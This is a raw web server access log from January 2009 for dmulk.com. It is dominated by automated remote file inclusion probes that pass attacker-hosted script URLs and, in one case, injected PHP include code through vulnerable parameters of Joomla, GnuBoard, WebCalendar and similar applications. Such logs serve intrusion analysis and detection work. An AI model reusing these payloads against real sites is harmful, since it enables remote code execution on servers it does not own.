66.152.162.116 - - [30/Jan/2009:09:38:26 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.813" "www.dmulk.com"
85.236.53.4 - - [30/Jan/2009:09:38:46 -0800] "GET /logs/access_080817.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://euromovers.de/tmp/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:38:53 -0800] "GET /logs/access_080817.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:40:49 -0800] "GET /logs/access_080820.log%20/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:40:50 -0800] "GET /phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:40:50 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:40:55 -0800] "GET /logs/access_080820.log%20/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:40:55 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:40:55 -0800] "GET /phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:41:29 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:09:41:29 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:42:17 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:09:42:23 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:09:42:36 -0800] "GET /?show=slide&pageid=17&nggpage=2 HTTP/1.0" 200 146543 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:43:04 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:43:04 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:43:05 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:43:22 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:43:23 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95225 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.73.228 - - [30/Jan/2009:09:43:27 -0800] "GET /blog/wp-content/gallery/crestoc-2008/img_0092.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
202.67.13.250 - - [30/Jan/2009:09:43:57 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:09:44:33 -0800] "GET /logs//GnuBoard/common.php?g4_path=.http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:09:44:38 -0800] "GET /GnuBoard/common.php?g4_path=.http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
118.107.162.36 - - [30/Jan/2009:09:44:54 -0800] "GET /logs//GnuBoard/common.php?g4_path=.http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "dmulk.com"
118.107.162.36 - - [30/Jan/2009:09:44:56 -0800] "GET /GnuBoard/common.php?g4_path=.http://madrigaldelavera.es/joomla/mambots/editors/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:45:10 -0800] "GET /logs/access_080702.log%20%20/errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:45:10 -0800] "GET /logs/errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:45:10 -0800] "GET /errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:45:50 -0800] "GET /logs/access_080805.log%20%20/errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:09:46:06 -0800] "GET /tiny_includes/config.php?dir_ws=http://thaictclub.com/community/backup/sp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:09:46:07 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://thaictclub.com/community/backup/sp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.220 - - [30/Jan/2009:09:46:07 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://thaictclub.com/community/backup/sp.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:09:46:14 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.55.179.19 - - [30/Jan/2009:09:46:31 -0800] "GET /logs/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.55.179.19 - - [30/Jan/2009:09:46:31 -0800] "GET /logs/access_080526.log/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.55.179.19 - - [30/Jan/2009:09:46:31 -0800] "GET /index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:09:46:43 -0800] "GET /tiny_includes/config.php?dir_ws=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:09:46:43 -0800] "GET /logs/access_071226.log//tiny_includes/config.php?dir_ws=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:09:46:43 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:09:46:43 -0800] "GET /logs/access_080928.log//tiny_includes/config.php?dir_ws=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:47:07 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:47:09 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:47:22 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:47:23 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95183 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:09:47:47 -0800] "GET /logs/access_071226.log%20//tiny_includes/config.php?dir_ws=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:09:48:23 -0800] "GET /?view=page&pagename=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 200 7990 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:09:48:23 -0800] "GET /logs/?view=page&pagename=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 200 84604 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:09:48:33 -0800] "GET /logs/access_080907.log/?view=page&pagename=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:09:48:35 -0800] "GET /logs/access.log/?view=page&pagename=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:48:38 -0800] "GET /logs/access_080313.log/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:48:39 -0800] "GET /components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:48:39 -0800] "GET /logs/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:48:41 -0800] "GET /logs/access_080512.log/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:49:05 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:49:05 -0800] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:49:05 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:05 -0800] "GET /logs/access_081227.log//WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:05 -0800] "GET /WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:05 -0800] "GET /logs//WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:05 -0800] "GET /logs/access_081227.log//WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:06 -0800] "GET /WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [30/Jan/2009:09:49:06 -0800] "GET /logs//WebCalendar/ws/get_events.php?includedir=http://www.mariagemixte.com/rencontre/safe1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:49:15 -0800] "GET /logs/access_080313.log/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:49:15 -0800] "GET /components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:49:16 -0800] "GET /logs/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:49:20 -0800] "GET /logs/access_080512.log/components/com_forum/forum.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:49:23 -0800] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:51:23 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:51:24 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:51:24 -0800] "GET /logs/access_080510.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:51:37 -0800] "GET /logs/access_080510.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:51:37 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:51:37 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:05 -0800] "GET /logs/access_080928.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:06 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:06 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:53:28 -0800] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:53:29 -0800] "GET /logs/access_080827.log/errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:09:53:29 -0800] "GET /logs/access_080805.log/errors.php?error=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:53:33 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:53:33 -0800] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
218.150.78.201 - - [30/Jan/2009:09:53:33 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:43 -0800] "GET /logs/access_080928.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:43 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:53:44 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.17.179 - - [30/Jan/2009:09:54:02 -0800] "GET /blog/index.php/2008/06/05/ HTTP/1.0" 200 11016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:54:07 -0800] "GET /logs/access_080507.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:54:35 -0800] "GET /logs/access_080507.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:54:46 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:09:54:47 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95167 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:09:55:19 -0800] "GET /logs/access_080510.log%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://acerbix.altervista.org/iddd.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:09:55:29 -0800] "GET /logs/access_080510.log//errors.php?error=http://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:09:55:30 -0800] "GET /errors.php?error=http://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.245.138.143 - - [30/Jan/2009:09:55:30 -0800] "GET /logs//errors.php?error=http://www.aerothaiunion.com/sik.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.226.133.29 - - [30/Jan/2009:09:55:44 -0800] "GET /logs/access_080510.log//errors.php?error=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.226.133.29 - - [30/Jan/2009:09:55:44 -0800] "GET /errors.php?error=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.226.133.29 - - [30/Jan/2009:09:55:45 -0800] "GET /logs//errors.php?error=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:56:14 -0800] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:56:15 -0800] "GET /logs/access_080715.log/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:56:15 -0800] "GET /templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:56:15 -0800] "GET /logs/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.89.90 - - [30/Jan/2009:09:56:46 -0800] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://h1.ripway.com/69696969/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:09:57:29 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:09:57:30 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:09:58:32 -0800] "GET /logs/access_080823.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:58:36 -0800] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:09:58:36 -0800] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:59:54 -0800] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:59:56 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95146 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:09:59:56 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:08 -0800] "GET /logs/access_080711.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:00:12 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [30/Jan/2009:10:00:12 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.parejasliberalescanarias.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:00:14 -0800] "GET /logs/access_080510.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
